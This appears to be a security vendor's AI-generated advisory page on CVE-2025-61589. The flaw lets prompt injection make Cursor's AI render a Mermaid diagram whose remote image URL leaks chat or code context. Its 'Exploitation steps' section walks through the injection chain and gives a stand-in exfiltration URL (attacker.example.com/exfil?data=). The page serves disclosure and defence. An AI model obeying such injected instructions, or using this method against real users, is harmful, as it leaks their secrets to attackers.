CVE-2025-61589
NixOS vulnerability analysis and mitigation

Overview

CVE-2025-61589 is an information leakage vulnerability in Cursor, an AI-powered code editor developed by Anysphere, affecting versions 1.6 and below. The vulnerability arises from Cursor's Mermaid diagram rendering feature, which allows embedding external images in the chat box that can be leveraged to exfiltrate sensitive information to an attacker-controlled server via prompt injection. It was published on October 2–3, 2025, and patched in version 1.7. The CVSS v3.1 base score is 5.9 (Medium) (GitHub Advisory GHSA-xw2x-252g-97w2, Feedly).

Technical details

The root cause is classified as CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor). Cursor's integration of the Mermaid diagramming library permits embedding remote images in diagrams rendered within the chat interface; when a prompt injection attack is successfully executed — via malicious web content, uploaded images, or source code — the attacker can craft a Mermaid diagram containing an image URL pointing to an attacker-controlled server, causing Cursor to fetch the image and potentially leak sensitive context (e.g., chat history, code snippets, or environment details) as part of the HTTP request. A malicious AI model, hallucination, or backdoored model could also trigger this behavior autonomously. Additional bypasses beyond the initial fix were subsequently discovered and documented in the related advisory GHSA-43wj-mwcc-x93p (CVE-2025-54132), which affected version 1.1.3 and was patched in version 1.3 (GitHub Advisory GHSA-xw2x-252g-97w2, GitHub Advisory GHSA-43wj-mwcc-x93p).

Impact

Successful exploitation results in a high confidentiality impact — sensitive information such as source code, chat context, API keys, or other data present in the Cursor session can be silently exfiltrated to an attacker-controlled external server. Integrity and availability are not affected. The attack requires no privileges and no direct user interaction beyond the victim using Cursor with malicious data (e.g., opening a compromised repository or uploading a malicious file), making the exposure risk significant for developers working with untrusted code or content (GitHub Advisory GHSA-xw2x-252g-97w2, Feedly).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.041%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a successful prompt injection precondition, raising the attack complexity to High, which limits opportunistic exploitation (GitHub Advisory GHSA-xw2x-252g-97w2).

Exploitation steps

  1. Identify a target: Confirm the victim is using Cursor version 1.6 or below with the Mermaid diagram rendering feature active in the chat interface.
  2. Prepare malicious data: Craft a prompt injection payload embedded in a source file, uploaded image, or web content that the victim will open or reference in Cursor. The payload instructs the AI to generate a Mermaid diagram containing an embedded remote image URL pointing to an attacker-controlled server (e.g., https://attacker.example.com/exfil?data=<sensitive_info>).
  3. Trigger prompt injection: Cause the victim to load the malicious data into Cursor's AI chat context — for example, by having them open a compromised repository file, paste malicious code, or browse a malicious web page referenced in the chat.
  4. Mermaid diagram rendered: The AI, influenced by the injected prompt, generates a Mermaid diagram block containing the attacker's image URL. Cursor renders the diagram in the chat box and fetches the remote image.
  5. Exfiltrate data: The HTTP image fetch request carries sensitive context (e.g., chat history fragments, environment variables, or code snippets encoded in URL parameters) to the attacker's server, which logs the incoming request and extracts the data (GitHub Advisory GHSA-xw2x-252g-97w2, GitHub Advisory GHSA-43wj-mwcc-x93p).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS GET requests from the Cursor application process to unknown or suspicious external servers, particularly requests with encoded query parameters that resemble chat content or source code fragments.
  • Network: DNS lookups or connections to attacker-controlled domains initiated by the Cursor renderer process during chat interactions involving Mermaid diagrams.
  • Logs: Application or proxy logs showing image fetch requests (e.g., GET https://<external-host>/...?data=...) originating from the Cursor process that do not correspond to known CDN or asset domains.
  • Process: The Cursor renderer or Electron process making outbound network connections to non-Anysphere, non-CDN endpoints during diagram rendering events (GitHub Advisory GHSA-xw2x-252g-97w2).

Mitigation and workarounds

The vendor fix in Cursor version 1.7 removes all remote images from Mermaid diagrams before rendering, eliminating the exfiltration vector. Users should upgrade to Cursor 1.7 or later immediately. As interim measures, avoid opening untrusted source files, repositories, or web content within Cursor's AI chat, and monitor outbound network connections from the Cursor process for anomalies (GitHub Advisory GHSA-xw2x-252g-97w2).

Community reactions

The advisory was published by Anysphere's security team (hmwildermuth) on GitHub on October 2, 2025, crediting researcher MaccariTA for the report. The related bypass advisory (GHSA-43wj-mwcc-x93p) credits both wunderwuzzi23 and MaccariTA, indicating iterative security research engagement with the Cursor team. No significant broader media coverage or notable social media discussion has been identified at this time (GitHub Advisory GHSA-xw2x-252g-97w2, GitHub Advisory GHSA-43wj-mwcc-x93p).

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-75874CRITICAL10
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74990CRITICAL9.8
  • NixOS logoNixOS
  • firefox-esr
NoYesAug 18, 2026
CVE-2026-74989CRITICAL9.8
  • NixOS logoNixOS
  • MozillaFirefox-translations-common
NoYesAug 18, 2026
CVE-2026-74988CRITICAL9.8
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74987CRITICAL9.8
  • NixOS logoNixOS
  • firefox-esr
NoYesAug 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management